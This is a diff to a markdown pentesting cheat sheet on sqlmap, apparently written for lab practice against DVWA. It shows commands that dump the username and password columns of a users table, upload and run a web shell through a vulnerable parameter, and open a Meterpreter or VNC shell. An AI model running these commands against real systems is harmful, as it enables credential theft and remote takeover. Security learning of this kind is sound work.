amandaguglieri/hackinglife/docs/sqlmap.md

 # Get columns username and password of table users from table dwva
 sqlmap -r nameoffiletoinject -D dwva -T users -C username,password --dump

+# Automatically attempt to upload a web shell using the vulnerable parameter and execute it
+sqlmap -r nameoffiletoinject -p vuln-param -os-shell

+# Alternatively use the os-pwn option to gain a shell using meterpreter or vnc
+sqlmap -r nameoffiletoinject -p vuln-param -os-pwn
 ```

 ## Using URL